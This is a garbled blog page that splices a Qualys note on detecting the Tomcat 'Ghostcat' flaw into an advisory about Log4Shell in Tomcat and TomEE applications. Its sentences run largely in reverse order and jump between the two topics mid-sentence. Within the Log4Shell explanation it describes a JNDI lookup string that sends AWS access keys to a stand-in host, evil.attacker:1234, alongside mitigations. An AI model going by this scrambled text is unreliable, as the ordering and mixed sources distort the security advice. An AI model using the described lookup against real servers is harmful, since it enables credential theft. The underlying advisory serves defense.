![]() About CVE-2020-1938Īpache Tomcat web servers are widely used for deploying Java-based web applications. ![]() This new Qualys WAS detection complements the detection that uses Qualys VMDR®. This blog post details how web application security teams can detect this vulnerability using Qualys Web Application Scanning (WAS). The Chinese cyber security company Chaitin Tech discovered the vulnerability, named “Ghostcat”, which is tracked using CVE-2020-1938 and rated critical severity with a CVSS v3 score of 9.8. There are a couple of mitigations available to you if you are running an application with a vulnerable version of log4j2.Īlternatively, as noted in Log4j2’s documentation you can remove the JndiLookup class from the jar file: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.As previously reported, a severe vulnerability exists in Apache Tomcat’s Apache JServ Protocol. We have verified this attack on Java 11 and onwards. If you are on the patched version of Java 8 and beyond, you are still vulnerable to this form of information disclosure. Most critically, it should be noted that this form of attack is not Java version specific. See Log4j2’s Lookups documentation for a full list of sources. If you’re running a server in EC2 on AWS and those environment variables are defined, the attacker would then be able to spin up and control machines in your AWS account.īeyond environment variables, attackers could use Log4j2 lookups to form query strings that obtain Java process arguments and system properties, Kubernetes environment attributes, Docker attributes, and more. The above would look for the environment variables AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY and send them to the host evil.attacker:1234 as a query string. However, If an attacker is able to supply a specially crafted string to an application, such as $ For example, it could be used to set the logging path for an application, and if that path needs to be changed for some reason, it can be changed in JNDI, rather than requiring the application to be rebuilt. Log4J2 has a JNDI plugin, which can be used to lookup values bound in JNDI. Like other vulnerabilities such as cross site scripting (XSS), this starts with untrusted user input. This is perhaps a little difficult to digest, so it perhaps helps to understand what’s going on with the help of a simple example. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.” “Apache Log4j2 <=2.14.1 JNDI features used in the configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. ![]() The vulnerability detail is available as part of the CVE here:, and also on the Log4J2 webpage here: Users are advised to update log4j2 to 2.16.0. Since this article was published, a further CVE, CVE-2021-45046 has been made public, and the previous mitigation of setting log4j2.noFormatMsgLookup to true does not guard against this. Either way, you ought to check your web applications for the presence of log42j (look for log4j-core*.jar), and take mitigating actions. Your applications may be including log4j2 as a conscious logging choice, or it may be included as a transitive dependency of another library or framework your application is using. Any jar file included in a web application’s WEB-INF/lib directory will be added to the application’s classpath and can be used by code in the application. However, before you breathe a sigh of relief, you should be aware that applications deployed on either TomEE or Tomcat can include additional Java libraries bundled inside. ![]() Tomcat, TomEE, and ActiveMQ themselves do not ship with log4j2, so running out-of-the-box with their default configuration they are not vulnerable to this issue. This particular vulnerability affects Apache Log4J2, a Java logging framework. If you’ve been following tech news over the last couple of days, you’ll very likely have heard about CVE-2021-44228, or “Log4Shell” as it has become known. ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |